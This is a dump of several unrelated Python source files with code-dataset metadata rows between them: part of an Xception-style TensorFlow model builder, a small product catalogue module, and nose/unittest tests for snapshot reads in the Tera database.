        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='Stage4_Conv1x1_768', dtype=tf.float32)
    layers.append(net)
    net = Layer.DepthwiseConv2D(net.output, convChannels=768, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='Stage4_DepthwiseConv768', dtype=tf.float32)
    layers.append(net)
    net = Layer.Conv2D(net.output, convChannels=384, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.Linear, \
        name='Stage4_Conv1x1_384b', dtype=tf.float32)
    layers.append(net)
    concated = tf.concat([toconcat.output, net.output], axis=3)
    # Linear 3x3 projection feeding the residual middle section.
    toadd = Layer.Conv2D(concated, convChannels=768, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.Linear, \
        name='SepConv768Toadd', dtype=tf.float32)
    layers.append(toadd)
    conved = toadd.output
    # Middle section: _numMiddle pre-activation residual blocks of three
    # ReLU -> SepConv(768) pairs each (convs themselves are linear).
    for idx in range(network._numMiddle):
        net = Layer.Activation(conved, Layer.ReLU, name='ActMiddle'+str(idx)+'_1')
        layers.append(net)
        net = Layer.SepConv2D(net.output, convChannels=768, \
            convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
            convInit=Layer.XavierInit, convPadding='SAME', \
            biasInit=Layer.ConstInit(0.0), \
            bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
            name='ConvMiddle'+str(idx)+'_1', dtype=tf.float32)
        layers.append(net)
        net = Layer.Activation(net.output, Layer.ReLU, name='ReLUMiddle'+str(idx)+'_2')
        layers.append(net)
        net = Layer.SepConv2D(net.output, convChannels=768, \
            convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
            convInit=Layer.XavierInit, convPadding='SAME', \
            biasInit=Layer.ConstInit(0.0), \
            bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
            name='ConvMiddle'+str(idx)+'_2', dtype=tf.float32)
        layers.append(net)
        net = Layer.Activation(net.output, Layer.ReLU, name='ReLUMiddle'+str(idx)+'_3')
        layers.append(net)
        net = Layer.SepConv2D(net.output, convChannels=768, \
            convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
            convInit=Layer.XavierInit, convPadding='SAME', \
            biasInit=Layer.ConstInit(0.0), \
            bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
            name='ConvMiddle'+str(idx)+'_3', dtype=tf.float32)
        layers.append(net)
        # Residual connection around the whole block.
        conved = net.output + conved
    # Exit section: pooled 1x1 shortcut added to a pooled concat branch.
    toadd = Layer.Conv2D(conved, convChannels=1536, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        pool=True, poolSize=[3, 3], poolStride=[2, 2], \
        poolType=Layer.MaxPool, poolPadding='SAME', \
        name='ConvExit1x1_1', dtype=tf.float32)
    layers.append(toadd)
    net = Layer.Activation(conved, Layer.ReLU, name='ActExit768_1')
    layers.append(net)
    toconcat = Layer.Conv2D(net.output, convChannels=768, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        pool=True, poolSize=[3, 3], poolStride=[2, 2], \
        poolType=Layer.MaxPool, poolPadding='SAME', \
        name='ConvExit768_1', dtype=tf.float32)
    layers.append(toconcat)
    net = Layer.Conv2D(toconcat.output, convChannels=1536, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='Exit_Conv1x1_1536', dtype=tf.float32)
    layers.append(net)
    net = Layer.DepthwiseConv2D(net.output, convChannels=1536, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='Exit_DepthwiseConv1536', dtype=tf.float32)
    layers.append(net)
    net = Layer.Conv2D(net.output, convChannels=768, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.Linear, \
        name='Exit_Conv1x1_768b', dtype=tf.float32)
    layers.append(net)
    concated = tf.concat([toconcat.output, net.output], axis=3)
    added = concated + toadd.output
    net = Layer.SepConv2D(added, convChannels=2048, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='ConvExit2048_1', dtype=tf.float32)
    layers.append(net)
    net = Layer.GlobalAvgPool(net.output, name='GlobalAvgPool')
    layers.append(net)
    return net.output, layers
def XcepCIFAR(network, images):
    """Build an Xception-style body sized for small (CIFAR-like) images.

    Entry flow: two plain convs, then residual separable-conv units whose
    shortcuts are 1x1 convs (strided or pooled to match the main path).
    Middle flow: network._numMiddle pre-activation residual blocks at 728
    channels. Exit flow: pooled residual unit, then 1536/2048 separable
    convs and a global average pool.

    Args:
        network: model object supplying _HParam['WeightDecay'], _numMiddle,
            and the _step/_ifTest tensors used by the batch-norm layers.
        images: image batch with pixel values in [0, 255].

    Returns:
        (features, layers): the pooled feature tensor and the list of all
        Layer objects constructed.
    """
    layers = []
    # Rescale pixels from [0, 255] to [-1, 1].
    standardized = tf.identity(images / 127.5 - 1, name='images_standardized')
    net = Layer.Conv2D(standardized, convChannels=32, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='ConvEntry32_1', dtype=tf.float32)
    layers.append(net)
    net = Layer.Conv2D(net.output, convChannels=64, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='ConvEntry64_1', dtype=tf.float32)
    layers.append(net)
    # Linear 1x1 shortcut for the first residual unit (no activation kwarg —
    # relies on the Layer default; matches Xception's linear shortcuts).
    toadd = Layer.Conv2D(net.output, convChannels=128, \
        convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        name='ConvEntry1x1_1', dtype=tf.float32)
    layers.append(toadd)
    net = Layer.SepConv2D(net.output, convChannels=128, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='ConvEntry128_1', dtype=tf.float32)
    layers.append(net)
    net = Layer.SepConv2D(net.output, convChannels=128, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        name='ConvEntry128_2', dtype=tf.float32)
    layers.append(net)
    added = toadd.output + net.output
    # Second unit: shortcut downsamples with a strided 1x1 conv while the
    # main path downsamples with max-pool on its last sep-conv.
    toadd = Layer.Conv2D(added, convChannels=256, \
        convKernel=[1, 1], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        name='ConvEntry1x1_2', dtype=tf.float32)
    layers.append(toadd)
    acted = Layer.Activation(added, Layer.ReLU, name='ReLUEntry256_0')
    layers.append(acted)
    net = Layer.SepConv2D(acted.output, convChannels=256, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='ConvEntry256_1', dtype=tf.float32)
    layers.append(net)
    net = Layer.SepConv2D(net.output, convChannels=256, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        pool=True, poolSize=[3, 3], poolStride=[2, 2], \
        poolType=Layer.MaxPool, poolPadding='SAME', \
        name='ConvEntry256_2', dtype=tf.float32)
    layers.append(net)
    added = toadd.output + net.output
    # Third unit at Xception's characteristic 728 channels.
    toadd = Layer.Conv2D(added, convChannels=728, \
        convKernel=[1, 1], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        name='ConvEntry1x1_3', dtype=tf.float32)
    layers.append(toadd)
    acted = Layer.Activation(added, Layer.ReLU, name='ReLUEntry728_0')
    layers.append(acted)
    net = Layer.SepConv2D(acted.output, convChannels=728, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='ConvEntry728_1', dtype=tf.float32)
    layers.append(net)
    net = Layer.SepConv2D(net.output, convChannels=728, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        pool=True, poolSize=[3, 3], poolStride=[2, 2], \
        poolType=Layer.MaxPool, poolPadding='SAME', \
        name='ConvEntry728_2', dtype=tf.float32)
    layers.append(net)
    added = toadd.output + net.output
    conved = added
    # Middle flow: _numMiddle pre-activation residual blocks of three
    # ReLU -> SepConv(728) pairs each (convs themselves are linear).
    for idx in range(network._numMiddle):
        net = Layer.Activation(conved, Layer.ReLU, name='ActMiddle'+str(idx)+'_1')
        layers.append(net)
        net = Layer.SepConv2D(net.output, convChannels=728, \
            convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
            convInit=Layer.XavierInit, convPadding='SAME', \
            biasInit=Layer.ConstInit(0.0), \
            bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
            name='ConvMiddle'+str(idx)+'_1', dtype=tf.float32)
        layers.append(net)
        net = Layer.Activation(net.output, Layer.ReLU, name='ReLUMiddle'+str(idx)+'_2')
        layers.append(net)
        net = Layer.SepConv2D(net.output, convChannels=728, \
            convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
            convInit=Layer.XavierInit, convPadding='SAME', \
            biasInit=Layer.ConstInit(0.0), \
            bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
            name='ConvMiddle'+str(idx)+'_2', dtype=tf.float32)
        layers.append(net)
        net = Layer.Activation(net.output, Layer.ReLU, name='ReLUMiddle'+str(idx)+'_3')
        layers.append(net)
        net = Layer.SepConv2D(net.output, convChannels=728, \
            convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
            convInit=Layer.XavierInit, convPadding='SAME', \
            biasInit=Layer.ConstInit(0.0), \
            bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
            name='ConvMiddle'+str(idx)+'_3', dtype=tf.float32)
        layers.append(net)
        # Residual connection around the whole block.
        conved = net.output + conved
    # Exit flow: strided 1x1 shortcut added to a pooled sep-conv branch.
    toadd = Layer.Conv2D(conved, convChannels=1024, \
        convKernel=[1, 1], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        name='ConvExit1x1_1', dtype=tf.float32)
    layers.append(toadd)
    net = Layer.Activation(conved, Layer.ReLU, name='ActExit728_1')
    layers.append(net)
    net = Layer.SepConv2D(net.output, convChannels=728, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='ConvExit728_1', dtype=tf.float32)
    layers.append(net)
    net = Layer.SepConv2D(net.output, convChannels=1024, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        pool=True, poolSize=[3, 3], poolStride=[2, 2], \
        poolType=Layer.MaxPool, poolPadding='SAME', \
        name='ConvExit1024_1', dtype=tf.float32)
    layers.append(net)
    added = toadd.output + net.output
    net = Layer.SepConv2D(added, convChannels=1536, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='ConvExit1536_1', dtype=tf.float32)
    layers.append(net)
    net = Layer.SepConv2D(net.output, convChannels=2048, \
        convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
        convInit=Layer.XavierInit, convPadding='SAME', \
        biasInit=Layer.ConstInit(0.0), \
        bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
        activation=Layer.ReLU, \
        name='ConvExit2048_1', dtype=tf.float32)
    layers.append(net)
    net = Layer.GlobalAvgPool(net.output, name='GlobalAvgPool')
    layers.append(net)
    return net.output, layers
| 61.173824
| 189
| 0.54512
| 21,040
| 209,398
| 5.310884
| 0.022814
| 0.042974
| 0.030445
| 0.036209
| 0.957384
| 0.953634
| 0.948452
| 0.946152
| 0.942689
| 0.941875
| 0
| 0.034116
| 0.31997
| 209,398
| 3,422
| 190
| 61.191701
| 0.750599
| 0.104313
| 0
| 0.902861
| 0
| 0
| 0.053168
| 0.000604
| 0
| 0
| 0
| 0
| 0.002826
| 1
| 0.026139
| false
| 0.001413
| 0.002119
| 0.000353
| 0.049099
| 0.024373
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
408e965571886bdd1a11ae164c4e6a3ec90948ca
| 1,202
|
py
|
Python
|
python/module/data.py
|
PythonXCII/internship_aug2020
|
3e10bc7ced0c8f8efb5d5d2d8cf6809a82363ea0
|
[
"Unlicense"
] | null | null | null |
python/module/data.py
|
PythonXCII/internship_aug2020
|
3e10bc7ced0c8f8efb5d5d2d8cf6809a82363ea0
|
[
"Unlicense"
] | null | null | null |
python/module/data.py
|
PythonXCII/internship_aug2020
|
3e10bc7ced0c8f8efb5d5d2d8cf6809a82363ea0
|
[
"Unlicense"
] | null | null | null |
# Demo product catalogue: every product shares the same stock-amount range;
# the last two entries use a price floor of 0 instead of 1.
products = [
    {
        "name": f"Prod{idx}",
        "amount": {"min": 10000, "max": 99999},
        "price": {"min": 1 if idx <= 8 else 0, "max": 100},
    }
    for idx in range(1, 11)
]

# Accumulates product objects created elsewhere.
obj_list = []
class ParentProduct:
    """Base product identified solely by a name."""

    def __init__(self, name):
        # Human-readable product name.
        self.name = name

    def show_name(self):
        """Print a sentence naming this product and return the same text."""
        message = f"Name of this product is {self.name}"
        print(message)
        return message
| 52.26087
| 96
| 0.506656
| 154
| 1,202
| 3.915584
| 0.233766
| 0.149254
| 0.232172
| 0.281924
| 0.759536
| 0.759536
| 0.759536
| 0.759536
| 0.666667
| 0.666667
| 0
| 0.154555
| 0.187188
| 1,202
| 22
| 97
| 54.636364
| 0.462641
| 0
| 0
| 0
| 0
| 0
| 0.325291
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0
| 0
| 0.210526
| 0.052632
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40ce0430dab24f60ff496f813777045b3352747a
| 10,452
|
py
|
Python
|
test/testcase/test_snapshot.py
|
abin-coding/baidu
|
8cd2bc1d69c7b93afc8e96c8af2c9489e0b51012
|
[
"BSD-3-Clause"
] | 4
|
2015-11-05T07:39:09.000Z
|
2021-11-17T10:45:46.000Z
|
test/testcase/test_snapshot.py
|
abin-coding/baidu
|
8cd2bc1d69c7b93afc8e96c8af2c9489e0b51012
|
[
"BSD-3-Clause"
] | null | null | null |
test/testcase/test_snapshot.py
|
abin-coding/baidu
|
8cd2bc1d69c7b93afc8e96c8af2c9489e0b51012
|
[
"BSD-3-Clause"
] | 3
|
2018-10-18T03:31:26.000Z
|
2019-11-15T04:19:08.000Z
|
'''
Copyright (c) 2015, Baidu.com, Inc. All Rights Reserved
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
'''
import nose
import time
import unittest
import common
from conf import const
def setup():
    # Module-level nose setup hook; nothing to prepare for this module.
    pass
def teardown():
    # Module-level nose teardown hook; nothing to clean up for this module.
    pass
class Snapshot(unittest.TestCase):
    def setUp(self):
        """Query tablet-server status, then reset cluster state before each test."""
        # Output is currently unused; the commented assert below once checked
        # that every configured tablet node reported kReady.
        out = common.runcmd_output("cd %s; ./teracli showts|grep kReady" % (const.teracli_dir), ignore_status=True)
        #assert( len(out.split('\n')) == len(const.tabletnode_list) )
        common.check_core()
        common.cleanup()
        #common.createbyfile('testcase/data/table_schema')
    def tearDown(self):
        # Per-test teardown; cleanup happens in the next test's setUp instead.
        pass
'''
table write w/snapshot
1. write data set 1
2. create snapshot
3. write data set 2
4. scan w/snapshot, scan w/o snapshot & compare
:return: None
'''
def test_table_write_snapshot(self):
common.create_singleversion_table()
table_name = 'test'
dump_file1 = 'dump1.out'
dump_file2 = 'dump2.out'
scan_file1 = 'scan1.out'
scan_file2 = 'scan2.out'
common.run_tera_mark([(dump_file1, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
snapshot = common.snapshot_op(table_name)
common.run_tera_mark([(dump_file2, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
common.compact_tablets(common.get_tablet_list(table_name))
common.scan_table(table_name=table_name, file_path=scan_file1, allversion=False, snapshot=snapshot)
common.scan_table(table_name=table_name, file_path=scan_file2, allversion=False, snapshot=0)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
'''
table write deletion w/snapshot
1. write data set 1
2. create snapshot
3. delete data set 1
4. scan w/snapshot, scan w/o snapshot & compare
:return: None
'''
def test_table_write_del_snapshot(self):
common.create_singleversion_table()
table_name = 'test'
dump_file = 'dump.out'
scan_file1 = 'scan1.out'
scan_file2 = 'scan2.out'
common.run_tera_mark([(dump_file, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
snapshot = common.snapshot_op(table_name)
common.run_tera_mark([], op='d', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
common.compact_tablets(common.get_tablet_list(table_name))
common.scan_table(table_name=table_name, file_path=scan_file1, allversion=False, snapshot=snapshot)
common.scan_table(table_name=table_name, file_path=scan_file2, allversion=False, snapshot=0)
nose.tools.assert_true(common.compare_files(dump_file, scan_file1, need_sort=True))
nose.tools.assert_true(common.file_is_empty(scan_file2))
'''
table write w/version w/snapshot
1. write data set 1, 2
2. create snapshot
3. write data set 3, 4
4. scan w/snapshot, scan w/o snapshot & compare
:return: None
'''
def test_table_write_multiversion_snapshot(self):
common.create_multiversion_table()
table_name = 'test'
dump_file1 = 'dump1.out'
dump_file2 = 'dump2.out'
scan_file1 = 'scan1.out'
scan_file2 = 'scan2.out'
common.run_tera_mark([(dump_file1, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
common.run_tera_mark([(dump_file1, True)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
snapshot = common.snapshot_op(table_name)
common.run_tera_mark([(dump_file2, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
common.run_tera_mark([(dump_file2, True)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
common.compact_tablets(common.get_tablet_list(table_name))
common.scan_table(table_name=table_name, file_path=scan_file1, allversion=True, snapshot=snapshot)
common.scan_table(table_name=table_name, file_path=scan_file2, allversion=True, snapshot=0)
nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
def kv_snapshot_relaunch(self):
    """kv cluster relaunch

    1. write data set 1
    2. create snapshot
    3. write data set 2
    4. scan w/snapshot, scan w/o snapshot & compare
    5. kill & launch cluster
    6. repeat 4
    :return: None
    """
    # NOTE: the description above used to live as a bare string *before* the
    # def, where it was a no-op expression; it is now the real docstring.
    table_name = 'test'
    dump_file1 = 'dump1.out'
    dump_file2 = 'dump2.out'
    scan_file1 = 'scan1.out'
    scan_file2 = 'scan2.out'
    common.run_tera_mark([(dump_file1, False)], op='w', table_name=table_name, random='random',
                         key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
    snapshot = common.snapshot_op(table_name)
    common.run_tera_mark([(dump_file2, False)], op='w', table_name=table_name, random='random',
                         key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
    common.compact_tablets(common.get_tablet_list(table_name))
    common.scan_table(table_name=table_name, file_path=scan_file1, allversion=True, snapshot=snapshot)
    common.scan_table(table_name=table_name, file_path=scan_file2, allversion=True, snapshot=0)
    nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
    nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
    # Restart the whole cluster and verify the snapshot survives the relaunch.
    common.cluster_op('kill')
    common.cluster_op('launch')
    time.sleep(2)
    # NOTE(review): post-relaunch scans use allversion=False (pre-relaunch used
    # True) — looks intentional for a kv table, but worth confirming.
    common.scan_table(table_name=table_name, file_path=scan_file1, allversion=False, snapshot=snapshot)
    common.scan_table(table_name=table_name, file_path=scan_file2, allversion=False, snapshot=0)
    nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
    nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
def test_kv_snapshot_relaunch(self):
    """kv cluster relaunch

    1. write data set 1
    2. create snapshot
    3. write data set 2
    4. scan w/snapshot, scan w/o snapshot & compare
    5. kill & launch cluster
    6. repeat 4
    :return: None
    """
    # NOTE: the description above used to live as a bare string *before* the
    # def, where it was a no-op expression; it is now the real docstring.
    common.create_kv_table()
    self.kv_snapshot_relaunch()
def table_snapshot_relaunch(self):
    """table cluster relaunch

    1. write data set 1
    2. create snapshot
    3. write data set 2
    4. scan w/snapshot, scan w/o snapshot & compare
    5. kill & launch cluster
    6. repeat 4
    :return: None
    """
    # NOTE: the description above used to live as a bare string *before* the
    # def, where it was a no-op expression; it is now the real docstring.
    table_name = 'test'
    dump_file1 = 'dump1.out'
    dump_file2 = 'dump2.out'
    scan_file1 = 'scan1.out'
    scan_file2 = 'scan2.out'
    common.run_tera_mark([(dump_file1, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
                         key_seed=1, value_seed=10, value_size=100, num=10000, key_size=20)
    snapshot = common.snapshot_op(table_name)
    common.run_tera_mark([(dump_file2, False)], op='w', table_name=table_name, cf='cf0:q,cf1:q', random='random',
                         key_seed=1, value_seed=11, value_size=100, num=10000, key_size=20)
    common.compact_tablets(common.get_tablet_list(table_name))
    common.scan_table(table_name=table_name, file_path=scan_file1, allversion=True, snapshot=snapshot)
    common.scan_table(table_name=table_name, file_path=scan_file2, allversion=True, snapshot=0)
    nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
    nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
    # Restart the whole cluster and verify the snapshot survives the relaunch.
    common.cluster_op('kill')
    common.cluster_op('launch')
    time.sleep(2)
    common.scan_table(table_name=table_name, file_path=scan_file1, allversion=True, snapshot=snapshot)
    common.scan_table(table_name=table_name, file_path=scan_file2, allversion=True, snapshot=0)
    nose.tools.assert_true(common.compare_files(dump_file1, scan_file1, need_sort=True))
    nose.tools.assert_true(common.compare_files(dump_file2, scan_file2, need_sort=True))
def test_table_snapshot_relaunch(self):
    """table cluster relaunch

    1. write data set 1
    2. create snapshot
    3. write data set 2
    4. scan w/snapshot, scan w/o snapshot & compare
    5. kill & launch cluster
    6. repeat 4
    :return: None
    """
    # NOTE: the description above used to live as a bare string *before* the
    # def, where it was a no-op expression; it is now the real docstring.
    common.create_singleversion_table()
    self.table_snapshot_relaunch()
def test_kv_snapshot_multitablets(self):
    """kv snapshot w/multi tablets

    1. kv_snapshot_relaunch()
    :return: None
    """
    # NOTE: the description above used to live as a bare string *before* the
    # def, where it was a no-op expression; it is now the real docstring.
    # Create the kv table pre-split into multiple tablets (deli.10).
    common.createbyfile(schema=const.data_path + 'kv.schema', deli=const.data_path + 'deli.10')
    self.kv_snapshot_relaunch()
def test_table_snapshot_multitablets(self):
    """table snapshot w/multi tablets

    1. table_snapshot_relaunch()
    :return: None
    """
    # NOTE: the description above used to live as a bare string *before* the
    # def (a no-op expression) and misspelled the helper as
    # "test_tablev_snapshot_relaunch"; it is now the real docstring.
    # Create the table pre-split into multiple tablets (deli.10).
    common.createbyfile(schema=const.data_path + 'table.schema', deli=const.data_path + 'deli.10')
    self.table_snapshot_relaunch()
| 44.288136
| 117
| 0.647723
| 1,444
| 10,452
| 4.435596
| 0.099723
| 0.094145
| 0.056831
| 0.073068
| 0.892116
| 0.862451
| 0.852771
| 0.8484
| 0.834348
| 0.815301
| 0
| 0.042475
| 0.240911
| 10,452
| 235
| 118
| 44.476596
| 0.76481
| 0.025163
| 0
| 0.726563
| 0
| 0
| 0.05726
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 1
| 0.101563
| false
| 0.023438
| 0.039063
| 0
| 0.148438
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dc0d8b8c896e4c223d3af9c457714c28c3406540
| 667
|
py
|
Python
|
commands.py
|
MaskedTrench/bot
|
8ce755f7b195f8eb960dcb1f1b63de122ae3bd6f
|
[
"Apache-2.0"
] | null | null | null |
commands.py
|
MaskedTrench/bot
|
